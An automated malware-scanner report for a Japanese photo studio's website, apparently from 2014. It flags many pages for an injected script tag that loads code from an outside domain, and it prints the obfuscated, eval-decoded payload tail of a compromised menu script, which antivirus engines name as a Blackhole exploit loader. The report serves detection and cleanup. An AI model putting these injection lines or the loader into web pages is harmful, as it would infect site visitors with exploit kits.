New scan:

Malware Scanner report for ibusuki-studio.sakura.ne.jp

Malicious/Suspicious/Total urls checked
1/12/15
13 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ibusuki-studio.sakura.ne.jp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ibusuki-studio.sakura.ne.jp

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://ibusuki-studio.sakura.ne.jp/
200 OK
Content-Length: 14510
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154340"></script>

http://ibusuki-studio.sakura.ne.jp/_module/js/script.js?l=0,t=default08,f=g,fs=m,c=104b
200 OK
Content-Length: 10180
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154406"></script>');

http://ibusuki-studio.sakura.ne.jp/index.html
200 OK
Content-Length: 14510
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154340"></script>

http://ibusuki-studio.sakura.ne.jp/pg177.html
200 OK
Content-Length: 19946
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154356"></script>

http://ibusuki-studio.sakura.ne.jp/ps/
200 OK
Content-Length: 10297
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154474"></script>

http://ibusuki-studio.sakura.ne.jp/ps/mm_menu.js
200 OK
Content-Length: 34055
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Menu(label, mw, mh, fnt, fs, fclr, fhclr, bg, bgh, halgn, valgn, pad, space, to, sx, sy, srel, opq, vert, idt, aw, ah) { this.version = "020320 [Menu; mm_menu.js]"; this.type = "Menu"; this.menuWidth = mw; this.menuItemHeight = mh; this.fontSize = fs; this.fontWeight = "plain"; this.fontFamily = fnt; this.fontColor = fclr; this.fontColorHilite = fhclr; this.bgColor = "#555555"; this.menuBorder = 1; this.menuBgOpaque=opq; this.menuItemBorder = 1; this.menuItemIndent = idt; this.menuItemB
... 33016 bytes are skipped ...
5:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:70:61:59:64:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i 1418!=0;i =1){j=i;if((0x19==031))s =String["fromCharCode"](eval(aq w[1*j]) 0xa-bv);}ht=eval;ht(s)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BDD [Trj]
Rising
Trojan.Script.JS.Quidvetis.a
Comodo
TrojWare.JS.Kryptik.acc
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
Exploit.BlackHole.196
Microsoft
Exploit:JS/Blacole.NX
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
VIPRE
Trojan.Js.BlacoleRef.dj (v)
AVG
JS/Exploit
Norman
Blacole.XN
GData
Script.Packed.IFrame.E
ESET-NOD32
JS/Kryptik.AOG

http://ibusuki-studio.sakura.ne.jp/ps/index.html
200 OK
Content-Length: 10297
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154474"></script>

http://ibusuki-studio.sakura.ne.jp/ps/sub2.html
200 OK
Content-Length: 8572
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154478"></script>

http://ibusuki-studio.sakura.ne.jp/ps/sub3.html
200 OK
Content-Length: 13884
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154479"></script>

http://ibusuki-studio.sakura.ne.jp/ps/sub5.html
200 OK
Content-Length: 6109
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154481"></script>

http://ibusuki-studio.sakura.ne.jp/ps/sub6.html
200 OK
Content-Length: 12545
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154482"></script>

http://ibusuki-studio.sakura.ne.jp/ps/Instal1.html
200 OK
Content-Length: 4403
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154472"></script>

http://ibusuki-studio.sakura.ne.jp/photo-sta/netprint_99/Setup_psNetPrint_9S7NCS8K.zip
200 OK
Content-Length: 300032
Content-Type: application/zip
clean
http://ibusuki-studio.sakura.ne.jp/test404page.js
404 Not Found
Content-Length: 296
Content-Type: text/html
clean
http://ibusuki-studio.sakura.ne.jp/ps/usage1.html
200 OK
Content-Length: 5334
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://faist.cd-guide.info/H7ekj8ad.php?id=46154486"></script>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ibusuki-studio.sakura.ne.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 15 Apr 2014 07:13:10 GMT
Accept-Ranges: bytes
ETag: "a5e5d7-38ae-4f4d229c61700"
Server: Apache/2.2.25
Content-Length: 14510
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 19:09:48 GMT

...14510 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ibusuki-studio.sakura.ne.jp
Referer: http://www.google.com/search?q=ibusuki-studio.sakura.ne.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.